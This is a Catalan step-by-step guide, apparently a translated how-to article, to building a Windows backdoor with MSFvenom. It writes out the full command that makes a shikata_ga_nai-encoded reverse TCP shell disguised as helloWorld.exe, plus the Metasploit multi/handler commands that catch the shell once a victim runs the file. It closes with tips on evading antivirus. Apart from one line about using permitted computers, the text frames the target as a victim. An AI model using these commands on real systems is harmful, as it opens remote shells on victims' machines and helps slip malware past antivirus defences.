Una porta del darrere s’utilitza per evitar mecanismes de seguretat, sovint en secret i sobretot de forma indetectable. Mitjançant MSFvenom, la combinació de msfpayload i msfencode, és possible crear una porta posterior que es connecti de nou a l'atacant mitjançant el shell TCP invers. Per desenvolupar una porta posterior, heu de canviar la signatura del vostre programari maliciós per eludir qualsevol programari antivirus. Completeu aquest projecte en un parell d’ordinadors als quals tingueu permís per accedir i, en aquest procés, obtindreu més informació sobre la seguretat de l’ordinador i sobre com funciona aquest tipus de porta posterior.
Passos
Pas 1. Inicieu Kali i engegueu la consola del terminal
Pas 2. Escriviu ifconfig per mostrar la interfície i comproveu la vostra adreça IP
Pas 3. Escriviu codificadors msfvenom -l per mostrar la llista de codificadors
Utilitzarà x86 / shikata_ga_nai com a codificador
Pas 4. Escriviu "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --platform windows designa l'arquitectura a utilitzar.
- -p windows / shell / reverse_tcp designa les càrregues útils per incrustar.
- LHOST designa l'adreça IP de l'oient.
- LPORT designa el port de l’oient.
- -b "\ x00" designa per evitar un caràcter dolent (octets nuls).
- -e x86 / shikata_ga_nai designa el nom dels codificadors.
- -f exe> helloWorld.exe designa la sortida de format.
Pas 5. Escriviu msfconsole per activar el Metasploit
Ara heu generat la porta del darrere. Quan la víctima faci clic a helloWorld.exe, la càrrega útil de l'intèrpret d'ordres que s'inclou s'activarà i tornarà a connectar-se al vostre sistema. Per rebre la connexió, heu d'obrir el controlador múltiple a Metasploit i definir les càrregues útils
Pas 6. Escriviu use exploit / multi / handler
Pas 7. Escriviu set payload windows / shell / reverse_tcp
Pas 8. Escriviu l'opció Mostra per comprovar el mòdul
Pas 9. Escriviu set LHOST 192.168.48.129
"LHOST" designa l'adreça IP de l'oient
Pas 10. Escriviu set LPORT 4444
"LPORT" designa el port d'escolta
Pas 11. Escriviu Run i espereu la connexió des de la màquina de la víctima
Pas 12. Espereu que la víctima faci clic a helloWorld.exe
Aleshores, us connectareu amb èxit a la màquina de la víctima.
Consells
- L'ús de -i a MSFvenom representarà les iteracions de la codificació. De vegades, més iteracions poden ajudar a eludir el programari AV.
- Heu après a generar la porta del darrere i codificar-lo mitjançant MSFvenom, però aquest mètode no funcionarà perfectament contra alguns programes AV actualment. La raó darrere d'això és a causa de les plantilles d'execució a MSFvenom. Els proveïdors d'AV han afegit la signatura estàtica d'aquestes plantilles i només les han de buscar. La solució per a aquest problema és utilitzar una plantilla d’execució diferent o eines diferents.